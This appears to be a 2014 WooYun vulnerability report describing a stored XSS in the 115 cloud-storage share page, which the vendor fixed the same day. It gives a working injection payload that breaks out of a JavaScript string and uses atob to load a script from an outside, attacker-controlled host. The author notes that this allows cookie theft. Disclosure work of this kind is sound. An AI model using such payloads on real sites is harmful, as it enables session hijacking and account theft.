当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-089179

漏洞标题:115网盘储存型xss一枚

相关厂商:115网盘

漏洞作者: roker

提交时间:2014-12-30 10:47

修复时间:2014-12-30 16:20

公开时间:2014-12-30 16:20

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-30: 细节已通知厂商并且等待厂商处理中
2014-12-30: 厂商已经确认,细节仅向厂商公开
2014-12-30: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

rt。。
分享给基友种子时发现的。。。咳咳。。
所有种子。。都是我的!!~

详细说明:

在分享文件处

115.png


修改备注 然后看下分享后的 页面源码。
发现有个输出点在这个位置

1152.png


$(function(){
/*$('#js_jubao_btn').on('click', function(){
showDialog();
return false;
});*/
var refeURL = window.location.href;
if(document.referrer){
refeURL = document.referrer;
}
var remark = '输出点';
var url = 'http://115.com/?ct=movie&ac=report&title='+encodeURIComponent((remark?remark:document.title))+'&gift_code=5lba4k17hlwv&refe=' + encodeURIComponent(refeURL);
$('#js_jubao_btn').attr('href', url).attr('target', '_blank');
});
})();


直接输入xss代码的话 有字符长度限制,所以我们抓包修改。

'});});$.getScript(atob('Ly9xcXEuc2kvSE9HalFJ'));(function(){$(function(){a='


前后闭合 atob函数对远程js地址base64编码绕过 特殊符号的限制。

1153.png


http://115.com/lb/5lbcrs0iby4u

1156.jpg


当然也可以盗取用户cookie啦~ 所有种子都是我的啦哈哈~~

1154.jpg

漏洞证明:

1154.jpg


1156.jpg

修复方案:

加强过滤啦~

版权声明:转载请注明来源 roker@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-12-30 10:51

厂商回复:

感谢提交!

最新状态:

2014-12-30: